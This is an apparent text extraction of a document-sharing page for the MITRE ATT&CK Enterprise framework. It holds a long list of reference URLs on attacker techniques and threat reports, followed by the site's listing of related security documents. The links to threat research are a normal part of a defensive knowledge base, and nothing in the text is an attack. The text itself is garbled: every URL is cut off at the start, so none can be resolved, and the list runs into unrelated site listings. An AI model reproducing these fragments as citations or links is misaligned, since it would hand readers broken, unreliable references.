hat-web-skimmers-found-on-paas-heroku

new-vulnerabilities-in-microsoft-azure/
ovider-dlls.html

bersecurity/cybersecurity-incidents/
business-critical-information/

acker_details/

-million-passwords/
assword-reset-azure-ad/
github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
Windows.pdf

erver-2008-R2-and-2008/dd941614(v=ws.10)
erver-2012-R2-and-2012/dn311461(v=ws.11)

bject-interface-package-and-authenticode/

downloads/csmanual38.pdf

-remote.html
-remote-desktop-for-good-and-evil.html

ms-post-compromise-trick-to-authenticate-as-anyone/

ve-directory-backdoors
assets/oats/EN/OAT-014_Vulnerability_Scanning

works-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/

using-electron-to-stay-fully-undetected/
R-Horejsi-Abusing-Electron-Based-Applications-in-Targeted-Attacks.pdf

x/6/html/security_guide/chap-system_auditing

ypot-recon-new-variant-of-skidmap-targeting-redis/

bling_system_integrity_protection
/BlackEnergy_Quedagh.pdf
anced-persistent-attack-techniques-part-2.html
lling-an-unsigned-driver-during-development-and-test
design/dn653559(v=vs.85)?redirectedfrom=MSDN
estsigning-boot-configuration-option

re-host-path-volume-part-1-b382f2a6e216

es-overview/

event-4657

ware-hides-in-windows-registry/

reports/Unit_42/unit42-wirelurker.pdf

ribeDBInstances.html
eInstances.html

h-aws-incorporating-leaky-buckets-osint-workflow/

ryptunprotectdata
nes-brightly-targeted-campaign
re-distributed-in-phishing-campaign.html
edirectedfrom=MSDN

.10)?redirectedfrom=MSDN#XSLTsection127121120120

ows-server-2012-R2-and-2012/dn800668(v=ws.11)
m/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
m/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
nd-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6

of-big-data/78010/
he-china-chopper-web-shell-part-i.html

ach-a-cyber-jurassic-park/

ou-probably-have-never-heard-of/

ersia-game-over/
uration/xe-17/sec-pki-xe-17-book/sec-deploy-rsa-pki.html#GUID-1CB802D8-9DE3-447F-BECE-CF22F5E11436

ub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
t-primary-refresh-token

mon-and-splunk-318d3be141bc

ccess-control/local-accounts
xploits/linux/ssh

rvice/windows-time-service-tools-and-settings
rvice/windows-time-service-top

ols/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html

macos_osx_deep_dive/

mach-o-apps-part-ii-ddb13ebc8191
-book/sec-cr-t2.html#wp1047035630

diting/event-4720
cking-air-gapped-networks/
nagement/clear-eventlog

mmands/wevtutil
ware-disposable-email-service/

hould-be-on-your-mind.html

a-getting-a-foothold-in-under-5-minutes.html
-ns-poisoning

kcat-protection/

ws-commands/fsutil-behavior
analyzing.html
noberus-blackcat-alphv-rust-ransomware
han-ever-before-part-2
oft-exchange-zero-day-vulnerabilities/

nce-of-kb2871997-and-kb2928120-for-credential-protection/
lysis_slash_zero.pdf

/manage/component-updates/command-line-process-auditing
ows-server-2012-r2-and-2012/cc771525(v=ws.11)

enhancements-in-windows-xp-service-pack-2-and-windows-server-2003-service-pack-1
=vs.85).aspx

tion-and-dcom/
ment-via-dcom
ch-Detecting-Password-Spraying-with-Security-Event-Auditing

apt-attack-tools-of-the-trade/

d-to-know-about-callback-phishing

mping/dumping-and-cracking-mscash-cached-domain-credentials
ows-server-2012-r2-and-2012/hh994565(v%3Dws.11)
re-campaigns-now-equipped-ssh-capabilities
ileges-in-google-cloud-platform/
r-book/sec-cr-i3.html#wp1254331478
exim-server-vulnerability

tion-options-ifeo/

-entries-for-silent-process-exit
e-execution-options-hidden-from-autoruns-exe/

62807-2501-99&tabid=2

rying-emails-set-sights-on-russian-speaking-businesses/
runs-use-macros-cve-2017-8759-exploit/
techniques/google-dorks

ess-to-project

web-services/impersonation-and-ews-in-exchange
ed-applications/approve-just-in-time-access

ign-flaw-in-domain-wide-delegation-could-leave-google-workspace-vulnerable-for-takeover
egation-feature/

-Transaction-Process-Doppelganging.pdf
-way-to-impersonate-a-process/

earch-api-calls/

ement/view-activity-logs
github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/

feedback.html
anced-persistent-attack-techniques-part-1.html
or-torrents/

otely-in-python
nning-remote-commands?view=powershell-7.1
-cryptomining-operations/
escription?name=Backdoor:Win32/Lamin.A

kground-offense-and-defense-4be7ac62ac63
/windows/netexe-reference
r-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/

ows-server-2003/cc759554(v=ws.10)
tivedirectory.domain.getalltrustrelationships?redirectedfrom=MSDN&view=netframework-4.7.2#System_DirectoryServices_ActiveDirecto

tlo-technique-2/
d-attacks-against-taiwanese-government-agencies-2/

rmaster-to-sunshop
ieved October 2, 2018.

ves-health-and-make-sure-its-not-already-dying-on-you.html
started-with-vba-in-office

otm-06de294b-d216-47f6-ab77-ccb5166f98ea
m/comment-page-1/
ng-182943.html
ON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
m/securite/mimikatz/pass-the-ticket-kerberos

mand-to-execute-at-runtime

ing-container/
jection-technique-discovered/

terfaces/configuration/guide/hc51xcrsbook/hc51span.html
rt-mirroring-ex-series.html
/osx_flashback.pdf

-mlhlp1010/mac
ber-security/pdf/cloud-hopper-report-final-v4.pdf

erver-2012-r2-and-2012/hh831740(v=ws.11)

ets/resources/Certified_Pre-Owned.pdf

ty-zero-alert-led-to-discovery-of-solarwinds-attack
device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa

ing-campaign-dns-record-manipulation-at-scale.html

-middle-east.html
/blog/threat-research/2015/12/the-eps-awakens-part-two.html
inals-3f1f08304316
perspective/
o-deliver-zebrocy/
/6e3f7352-d11c-4d76-8c39-2516a9df36e8

Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_me
2-loading-techniques-for-evasion-and-persistence/
ame-hunting-ransomware-attack/

aming-technique
wngrade-attack/
nceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
nceptual/BPSystemStartup/Chapters/DesigningDaemons.html
MServer_Vulnerability_in_macOS_and_iOS.html

-prior-zero-days-and-the-pirpi-payload/
birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
al-machine-memory.html
unsecured-docker-daemons-revealed/

-for-group-policy-preferences.aspx

-apt-group-2.html
ge-operations/
ources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf

ta-handler.html
ovter-persistence/

en-you-log-in-mh15189/mac
nceptual/BPSystemStartup/Chapters/CreatingLoginItems.html

n-item-or-a-launchagent-launchdaemon/
ntroduction/Intro.html#//apple_ref/doc/uid/DTS10003788

ad-https-traffic/

erence/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
latform-open-redirection
app-engine-and-azure-app-service
ian-apt-phishing-attack/
a407-silent-librarian

de-campaign/

l-compromise/#:~:text=Vendor%20email%20compromise%2C%20also%20referred,steal%20from%20that%20vendor%27s%20customers.
k-extortion-part-1/

dicted-wide-ranging-scheme-commit-cyber-attacks-and
ness-email-compromise-and-real-estate-wire-fraud-111422.pdf/view

acking-ce7a8aca506742ab8e8873e7f9f229c2

es-tough-outlook-for-home-page-attacks.html
are-distribution/

rd-emerges-as-a-novel-and-distinct-russian-threat-actor/
No-Pineapple-Threat-Intelligence-Report-2023.pdf
f-securitybaseapi-duplicatetoken

attacks-targeting-journalists-and-human-rights-defenders-from-the-middle-east-and-north-africa/

ce-account/

art-register-app
h2-auth-code-flow
directory-v2-protocols
without-links-when-phishers-bring-along-their-own-web-pages/

r-federation/
-abuse-210ae2be2a5

mposite-alerts
mfa-app-passwords
apt42-operations

line-411-telephone-oriented-attack-delivery
e-powershell-self-pwn

-supply-chain-software-compromise.html
ntu-20-04-login-screen/

se-logonuserw
with-powershell.html
ows-server-2012-r2-and-2012/dn581922(v%3Dws.11)

rolemember?view=azureadps-1.0
and/cf_command_ref/show_monitor_permit_list_through_show_process_memory.html#wp3599497760
ords-to-adversaries-with-nppspy

logonnotify

dfir-2015.pdf

ell.management/register-wmievent?view=powershell-5.1
ect-format--mof-
cks-wheels-new-cannon-trojan/
lware-sandbox-evasion-techniques-36667
messaging-spam-through-the-cloud/
mposite-alerts

ure-to-on-prem-ad-d18cb3959d4d
nt-as-a-remote-access-trojan

count-control/how-user-account-control-works
age-2-ataware-ransomware-part-3
playing-with-the-windows-process-tree/
rent-and-command-line/

p_request.html

with-repeated-push-notifications/
allowing-device-access-due-to-overload-of-push-notifications

5550-_rm3d6xxbk52n

ell-scripts-from-c/
y.com/powershell-jobs-without-powershell-exe/

ult-programs
tudio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
mmands/assoc
_fakeav.gzd

m/johan/2005/08/linux-gate/

torm-0558-techniques-for-unauthorized-email-access/

zzard-conducts-targeted-social-engineering-over-microsoft-teams/

bit-application-data-in-the-registry
m-autoruns-exe/

nistration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
-role-ec2_instance-profiles.html
pic=7558554

dd-users-azure-active-directory
d-service-principals?tabs=browser
o-your-company-88e8da8e
nt.aspx?eventID=4670
diting/event-4738
SetNTLM-ChangeNTLM

are-campaign-updates-toolset-and-expands-targets/
file-Reference.pdf

ons-in-macos-depa5fb8376f/web

atility-to.html

ension-loading/

x-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/

n-loading-is-broken/

ts-mackeeper.html
n-and-profit/

-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/
a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/

nl-ntqueryinformationprocess

ch-linux-aur-package-repository/

4bf771d008e0073cec01b5561c6348a608f8dd7?environmentId=300
on-your-curiosity/

oofing-2022-trends

/microsoft-html-help-1-4-sdk

cve-2017-8625/

ncy-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
rency-miners-a-battle-for-resources.html

ionage-orb-networks

ophistication-as-a-strategy.html

indows-processes/
ng-new.html
ons-exhibit-consistent-techniques/
ansomware-Attack-WP.pdf
/demystifying-ransomware-attacks-against-microsoft-defender/ba-p/1928947
%20Beetle_Jan2022.pdf?__hstc=147695848.3e8f1a482c8f8d4531507747318e660b.1680005306711.1680005306711.1680005306711.1&_
=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
nder-Whitepaper-Chinese-APT.pdf

018/03/07190154/The-ProjectSauron-APT_research_KL.pdf

evilbunny-malware-instrumented-lua/

tate-actor-uses-compromised-private-ukrainian-military-emails
sla-spyware-variant.html
nd-line-spoofing/

vading-detection-with-shellcode
ndows-defender-application-control/microsoft-recommended-driver-block-rules
-macos-mm-install-macos.html

ded-attributes/
named-fork/
#anchor520553
ation-lockergoga-ransomware/

/blog/threat-research/2017/06/obfuscation-in-the-wild.html
bfuscation-report.pdf

ackdoor-in-the-wild-serves-blackhole/
k-the-curtains-on-encodedcommand-powershell-attacks/

ditional-access-exclusion

/posts/2011/02/02/iis-backdoor.html
urious-case-of-the-malicious-iis-module/

b/mmpc/archive/2012/10/03/malware-signed-with-the-adobe-code-signing-certificate.aspx
odules-overview
Native-Iis-Malware-wp.pdf
rgdoor-iis-backdoor-targets-middle-east/
tadata-and-digital-signatures-to-hide-binaries/
cyber-attack-on-singhealth-10-jan-2019.ashx
ne-red-teaming-technique/
are-protection/polymorphic-malware
-is-polymorphic-malware

ng-analysis-packing-akshay-unijc
PasswordPolicy.html
icies-on-non-ad-machines
-information-for-a-user-ubuntu
e-stories-dart-microsoft-detection-and-response-team
ux-malware-targets-dvrs-forms-botnet/

anges-tactics-now-more-difficult-to-detect

/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
09b5fed49a

s-dvrs-forms-botnet/

turning-to-golang/
ectToSMB.pdf

brary/IIS/4beddb35-0cba-424c-8b9b-a5832ad8e208.mspx
tlm-hashes/

rs-in-windows-operating-systems

are-profile.html

efenses-6f98657fc6ec
tionexecutewithprivileg
reat-analysis-shlayer-macos.html
llers-its-all-broken?slide=8

ating-the-leak-of-20gb-of-its-source-code-and-private-data/
hreats-decrypting-ssl-34840
ntinues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/
/blog/what-is-pastebin-and-why-do-hackers-love-it

harm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
k-informs-100k-of-breach-exposing-account-balance-pii/
data-breach-after-numbers-ported-data-accessed/
ata-breach-after-billing-system-hack/

-discreet-way-of-persistence

nt-dark-web-marketplace-for-stolen-data/
eb-supply-chain-stealer-logs-in-context/

dar-APT.pdf

oy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/

ilar-services-can-sync-malware/

quoted-services/

-system-currentcontrolset-services-registry-tree
nceptual/BPSystemStartup/Chapters/StartupItems.html
me-countries/
ucrative-targeted-ransomware/

ing-technique/85431/

targets-pyeongchang-olympics/
gets-multiple-sectors/

um_and_Ketrican.pdf

ccess-control/active-directory-accounts
stalled/7712/

sing-applocker/

sers-computers-windows-server-2008
ployeeCredentialsTargeted.pdf
-of-service-attack-on-github-tied-to-chinese-government/
ned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
sponse/whitepapers/the-continued-rise-of-ddos-attacks.pdf
r-Operations-in-Lebanon-and-Oman.pdf

-runs-on-mac-downloads-info-stealer-and-adware/
s-commands-via-discord-has-ransomware-feature/
y-documents.html

of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
nce-metadata-service?tabs=windows
threat-research/
ance-in-the-visual-basics.html

a/ef7087ac-3974-4452-aab2-7dba2214d239
techniques-612c484ab278

avigates-east-asia/

backs-on-windows-background-intelligent-transfer-service/

ks?view=vs-2019#code-element

g-understanding-and-defending-against-cloud-compute-resource-abuse/
t-in-policies#compute
rail-from-sending-events-to-cloudwatch-logs.html
oudtrail/update-trail.html
sumo-logic/

plore-microsoft-365-attacks-in-the-wild/d/d-id/1341591
iew=azure-cli-latest#az_monitor_diagnostic_settings_delete
detection__disruption/main.py

ell.Core/About/about_PowerShell_exe?view=powershell-5.1

urity-and-deployment?view=vs-2022
once-for-trusted-code-execution-1446ea8051c5
-need-is-one-a-clickonce-love-story/
oure-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk
oure-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OT
19-vaccine-theme-and-abuses-legitimate-online

o-group-uae/
hackers-sell-computer-flaws.html

elements_condition.html

ce-security-posture?language=en_US

g-secrets.html

user-data-breach/
ustomer-data-breach/
e-formats.html

de-injection-without-ptrace2.html
e-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

IOS_Forensics.pdf
Neilson-NetscreenDead-SLIDES.pdf

ces-abused-for-remote-code-execution-cryptocurrency-mining.html
auditing?view=o365-worldwide#sharepoint-sharing-events

-team9-malware-family/

-saved-credentials
ows-8.1-and-8/jj554668(v=ws.11)?redirectedfrom=MSDN
ows-server-2012-r2-and-2012/hh994565(v=ws.11)#credential-manager-store
d-credenumeratea

s-a-little-white-box-that-can-hack-your-network/

ng-cisco-s-network
usiness/106761/

napshot-permissions.html

ss-with-shared-access-signature

-email-based-attack-from-nobelium/

net-exploreredge/

curity-policy-settings/store-passwords-using-reversible-encryption
92252c1a16

cators/index.html
e/about/about_powershell_exe?view=powershell-5.1#-encodedcommand-base64encodedcommand

-compromises-trusted-websites-serving-dangerous-results/
igital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
mmand.html

mscriptsinstact

ables-group

7/psumac2019-345-Installer-Package-Scripting-Making-your-deployments-easier-one-at-a-time.pdf
7/aa338205(v=office.12)
on-attacks-bypassing-security-controls-living-land-38780

-word-document-delivers-malware-through-rat/
novel-rtf-template-inject-technique-poised-widespread

very-using-microsoft-office-template-injection/2104

nceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
enerator.8.html

ss-Is-No-One-Hunting-For-Token-Manipulation.pdf
=vs.85).aspx
=vs.85).aspx
=vs.85).aspx

ckheed-hack/282818/

putter-panda.original.pdf
ed-targeting-brazilian-banks/

rs-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805
t-record.html
a_ComRAT.pdf
018/03/08064459/Equation_group_questions_and_answers.pdf

rsistence-systemd-timers-cron/

ersistence/

wastedlocker-ransomware-us

ch/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-l
to/azure-ad-graph-api-operations-overview

eptual/NetServices/Introduction.html

-of-the-day-advanced-way-to-check-domain-availability-for-office-365-and-azure
vent-reference-aws-console-sign-in-events.html

alicious-tls-callback-technique.html
next-strike/
/module3/Module3_2_fingerprinting.pdf

ackdoors-are-suddenly-back/

ngine-optimization-tactics-to-redirect-traffic-and-install-malware/
oad-delivery-options/

king-game-fc42f5913fb7
-in-an-open-source-supply-chain-attack/
hreats/pdfs/rpt-dll-sideloading.pdf
natch-eng.pdf
ted-darkhotel-apt-activity-update/
p-v/appv-getting-started

sion-t1202/

xe-3C291419F60CDF9C2E4E19AD89944FA3.html
beyond-investigating-and-defending-office-365
365-activities-api-to-investigate-business-email-compromises/

trategies-for-microsoft-365-to-defend-against-unc2452
es/add-mailboxpermission?view=exchange-ps
ogle-platforms-phishing/gws-app-scripts
pp-script-analysis
-specifically-targeting-lambda/

ok-cloudmensis-macos-spyware/

tections-by-accident-and-design/

trace-d3ea7191a4be

e-your-pc-or-mac-laptop
er-campaign
loader-malware.html
-target-windows-and-android-users/
ds-via-tp-links-cve-2023-1389

eriences/powercfg-command-line-options?adlt=strict
hes-to-evade-cobalt-strike-shellcode-detection
cator-Resolving-Obfuscated-API-Functions-In-Modern-Packers.pdf
ng-PInvoke.html?s=03
hashing-in-malware

de-injection-trick/

y-real-threat-very-fake-update
delivers-icedid-forked-loader
-with-apache-mod_rewrite/
owser-date-current-landscape-fake-browser-updates
-increases-sophistication-and-evasion-in-ongoing-attacks/
de-campaign/

Ri&xs=524303#page=1
5-defender-to-coordinate-protection-against-solorigate/
nt-nation-state-cyber-attacks/

y-to-proxy-code-execution-8d524f642b75
pting-using-msxsl-script
cloudtrail.html

g-use-azuremonitor
walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/

ongpity3.html
nder-Whitepaper-StrongPity-APT.pdf

snmp-net-snmp-snmpv3-1051

ntroduction
ment/how-to-connect-fed-azure-adfs
attack-malvertising-windows-android-devices
018/03/20134940/kaspersky-lab-gauss.pdf
rrow_Pitts_Master.pdf

7f975da.pdf

17/august/smuggling-hta-files-in-internet-exploreredge/
a9dbbb53d5ea

streams-in-ntfs/

nd-how-to-execute-it-part-2/
nd-how-to-execute-it/
-alternate-data-streams-windows-your-data-secure-can-you-restore
rce/credentials/Invoke-Kerberoast.ps1
rincipal-names-spns-setspn-syntax-setspn-exe.aspx

ing-servers-using-1-day-vulnerabilities/
-book/sec-cr-s2.html#wp1896741674
h-a-time-server/
-macos-malware-dazzlespy-asia/

arted/windows-time-service/windows-time-service-tools-and-settings

09_rivner_schwartz.pdf
ry-technique-explained-mitre-attack-t1082
how-attackers-avoid-malware-analysis
us-linux-job-craig-rowland/

n/modulestomping-dll-hollowing-shellcode-injection

uncovered-due-to-spectacularly-bad-opsec
2-defense-against-user-land/
procedure-on-my-machine/

ues-user-mode/

escription?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918

ods-to-find-hooked-functions-and-apis

-hooks-in.html

m/security-center/writeup/2000-122010-2655-99
ts-down-after-cyber-attack
ws-commands/diskshadow
x-ransomware

ps-were-safe-they-were-wrong/

gbackup/blob/master/netshell.html

srr_20180118_us_v.1.0.pdf
leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
ead-dns-hijacking-attacks/

/common-language-runtime-integration-overview?view=sql-server-2017
-procedures/xp-cmdshell-transact-sql?view=sql-server-2017

/sql-server-persistence-part-1-startup-stored-procedures/
ng-sql-server-clr-assemblies/
s-hacktivist-group-rebelling-against-ai/
ms-it-can-read-the-on-network-incident-response-chat-rooms
ak-who-hacked-rockstar-and-what-was-stolen
and/cf_command_ref/C_commands.html#wp1068167689

ols/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html
lib-hijacking.pdf
on/situational_awareness/host/osx/HijackScanner.py
d6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
esforce-zero-day-in-facebook-phishing-attack/
-catalog-and-other/
let-attackers-backdoor-google-accounts/

using-rcsi-exe/
using-dnx-exe/

ws-commands/shutdown
2-loading-techniques-for-evasion-and-persistence/
mc-vulnerabilities/

ws-commands/mmc
ws-commands/wbadmin-delete-catalog

management-components/what-is-microsoft-management-console
507c2f0ea5d61a1284fe65387d172f81/detection

t-and-fivehands-ransomware-sophisticated-financial-threat.html
filing/profiling-overview
k-4.0/ee471451(v=vs.100)

com/2017/05/subvert-clr-process-listing-with-net.html
943296560.1555683782-1066572390.1555511517
96-9a04-44e5a124d770
p%20without%20the%20victim%20noticing
nage-Case.pdf
%20Southeast%20Asia%20April%202016.pdf
gn-approach
ated-scripts
MRwxGOJaD0Xj6CRTNg_S-8KniRxtf9xzhz_ACvm_TpbJAIgWCV8yIsFgbhb8cuaZA
5306711.1680005306711.1&__hssc=147695848.1.1680005306711&__hsfp=3000179024&hsCtaTracking=189ec409-ae2d-4909-8bf1-62d

&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments
ng-deep-an-analysis-of-earth-lusca-operations.pdf
1-744063452.1505819992
0.1502477046
-compromise
sted-to-any-website/128680/)

uid/TP40001067-CH274-SW1
ation-state-attacks/

-_-OCSTHGUJ-OCSTLM5A-OCSTLM6B-OCHW206-_-E
rectoryServices_ActiveDirectory_Domain_GetAllTrustRelationships
Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk3
20vendor%27s%20customers.
5306711.1680005306711.1&__hssc=147695848.1.1680005306711&__hsfp=3000179024&hsCtaTracking=189ec409-ae2d-4909-8bf1-62d
E3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuM
MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..
ng-deep-an-analysis-of-earth-lusca-operations.pdf
89ec409-ae2d-4909-8bf1-62dcdd694372%7Cca91d317-8f10-4a38-9f80-367f551ad64d
o1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_autom
89ec409-ae2d-4909-8bf1-62dcdd694372%7Cca91d317-8f10-4a38-9f80-367f551ad64d
uMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
TcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
31006&utm_source=hs_automation

Enterprise Attack v16.1
No ratings yet
Enterprise Attack v16.1
1,855 pages
FY22 RVA Infographic - 508c
No ratings yet
FY22 RVA Infographic - 508c
12 pages
Techniques for Elevation and Access Token Abuse
No ratings yet
Techniques for Elevation and Access Token Abuse
2,087 pages
MITRE ATT&CK Wheel of Fortune
No ratings yet
MITRE ATT&CK Wheel of Fortune
122 pages
Learn MITRE ATT CK Mapping Effectively 1742470827
No ratings yet
Learn MITRE ATT CK Mapping Effectively 1742470827
44 pages
VTI Report 2025 09 11 10 50
No ratings yet
VTI Report 2025 09 11 10 50
7 pages
MSFT Cloud Architecture Security Commonattacks
No ratings yet
MSFT Cloud Architecture Security Commonattacks
2 pages
Joint Cybersecurity Agencies, Iranian Cyber Actors' Brute Force Andcredential Access Activity CompromisesCritical Infrastructure Organizations
No ratings yet
Joint Cybersecurity Agencies, Iranian Cyber Actors' Brute Force Andcredential Access Activity CompromisesCritical Infrastructure Organizations
15 pages
Network Security: Key Concepts and Attacks
No ratings yet
Network Security: Key Concepts and Attacks
55 pages
Red Team Operation Course (Online)
100% (1)
Red Team Operation Course (Online)
16 pages
Mitre Att&Ck
No ratings yet
Mitre Att&Ck
6 pages
CYBERSECURITY - AA20-283A-APT - Actors - Chaining - Vulnerabilities
No ratings yet
CYBERSECURITY - AA20-283A-APT - Actors - Chaining - Vulnerabilities
8 pages
Csa Chinese Exploit Vulnerabilities Uoo179811
No ratings yet
Csa Chinese Exploit Vulnerabilities Uoo179811
6 pages
PAW v4.1 - Envision - PAW - Workshop
No ratings yet
PAW v4.1 - Envision - PAW - Workshop
113 pages
Csa Iran Cyber Brute Force Critical Infrastructure Orgs
No ratings yet
Csa Iran Cyber Brute Force Critical Infrastructure Orgs
15 pages
Red Team Operations
No ratings yet
Red Team Operations
15 pages
Module 2
No ratings yet
Module 2
17 pages
DEF CON 32 - Michael Gorelik Arnold Osipov - Outlook Unleashing RCE Chaos CVE-2024-30103 & CVE-2024-38021
No ratings yet
DEF CON 32 - Michael Gorelik Arnold Osipov - Outlook Unleashing RCE Chaos CVE-2024-30103 & CVE-2024-38021
54 pages
Red Team Training
100% (2)
Red Team Training
16 pages
Network Security Module 4
No ratings yet
Network Security Module 4
15 pages
Event Codes for Red Team Operations
No ratings yet
Event Codes for Red Team Operations
19 pages
Csa Gru Global Brute Force Campaign Uoo158036-21
No ratings yet
Csa Gru Global Brute Force Campaign Uoo158036-21
8 pages
Red Team Operations
No ratings yet
Red Team Operations
16 pages
APT41 Threat Intelligence Advisory
No ratings yet
APT41 Threat Intelligence Advisory
3 pages
ST10252399 - Prse6212 - Home Test 1
No ratings yet
ST10252399 - Prse6212 - Home Test 1
17 pages
Understanding Vectra AI Detections
No ratings yet
Understanding Vectra AI Detections
210 pages
Understanding Vectra AI
No ratings yet
Understanding Vectra AI
198 pages
How To Think Like A Hacker and Stop Attacks Faster With The Mitre Att&Ck Framework
No ratings yet
How To Think Like A Hacker and Stop Attacks Faster With The Mitre Att&Ck Framework
55 pages
MITRE ATT&CK: Spear Phishing Attack Analysis
No ratings yet
MITRE ATT&CK: Spear Phishing Attack Analysis
4 pages
NS Module 4 and 5
No ratings yet
NS Module 4 and 5
19 pages
Mitre
No ratings yet
Mitre
13 pages
HIMSS18 - Detecting Threats W ATTCK
No ratings yet
HIMSS18 - Detecting Threats W ATTCK
41 pages
MITRE ATT CK With Window Event Log IDs 1670500871
No ratings yet
MITRE ATT CK With Window Event Log IDs 1670500871
23 pages
Cybersecurity Awareness and OSINT Guide
No ratings yet
Cybersecurity Awareness and OSINT Guide
77 pages
Advance Persistan Threat
No ratings yet
Advance Persistan Threat
7 pages
Advanced SOC Analyst Exercise-1
No ratings yet
Advanced SOC Analyst Exercise-1
74 pages
Understanding Cybersecurity Threats
No ratings yet
Understanding Cybersecurity Threats
32 pages
2021 Top Routinely Exploited Vulnerabilities
No ratings yet
2021 Top Routinely Exploited Vulnerabilities
20 pages
Security Threats and Mitigation Techniques
No ratings yet
Security Threats and Mitigation Techniques
3 pages
Cyber Attack Kill Chain
No ratings yet
Cyber Attack Kill Chain
23 pages
CITS1003 Cybersecurity Vulnerabilities
No ratings yet
CITS1003 Cybersecurity Vulnerabilities
34 pages
Top Routinely Exploited Vulnerabilities 1627549622
No ratings yet
Top Routinely Exploited Vulnerabilities 1627549622
18 pages
Otchet-Solar-JSOC-CERT-Tekhniki-i-taktiki-kiberprestupnikov - Final en
No ratings yet
Otchet-Solar-JSOC-CERT-Tekhniki-i-taktiki-kiberprestupnikov - Final en
16 pages
Enterprise Attack v16.1 Tactics
No ratings yet
Enterprise Attack v16.1 Tactics
1 page
2021 Threat Detection Report
No ratings yet
2021 Threat Detection Report
122 pages
Cybersecurity Tools & Threats Guide
No ratings yet
Cybersecurity Tools & Threats Guide
20 pages
DAY2 - Threat Report MITRE - Daily Report
No ratings yet
DAY2 - Threat Report MITRE - Daily Report
17 pages
Acalvio ShadowPlex Advanced Threat Defense Training v0.4
No ratings yet
Acalvio ShadowPlex Advanced Threat Defense Training v0.4
107 pages
Advanced Persistent Threat
No ratings yet
Advanced Persistent Threat
60 pages
FALLSEM2025 26 VL BCSE410L 00100 TH 2025-08-11 Module 1 Foundation For Cyber Security DR Meenakshi S P
No ratings yet
FALLSEM2025 26 VL BCSE410L 00100 TH 2025-08-11 Module 1 Foundation For Cyber Security DR Meenakshi S P
69 pages
Lecture 8
No ratings yet
Lecture 8
11 pages
Presentation 33109 Content Document 20250317022316PM
No ratings yet
Presentation 33109 Content Document 20250317022316PM
31 pages
Ethical Hacking Associate Information Security Threats Attacks
No ratings yet
Ethical Hacking Associate Information Security Threats Attacks
13 pages
UNIT 3 Notes For Cyber Security Notes English
No ratings yet
UNIT 3 Notes For Cyber Security Notes English
14 pages
Picus
No ratings yet
Picus
175 pages
CH11 NetSec6e
No ratings yet
CH11 NetSec6e
35 pages
MITRE Attack Framework
No ratings yet
MITRE Attack Framework
186 pages
Introductiontomitreattck 200328091951 200705113109
No ratings yet
Introductiontomitreattck 200328091951 200705113109
31 pages
Lateral Movement Analysis
No ratings yet
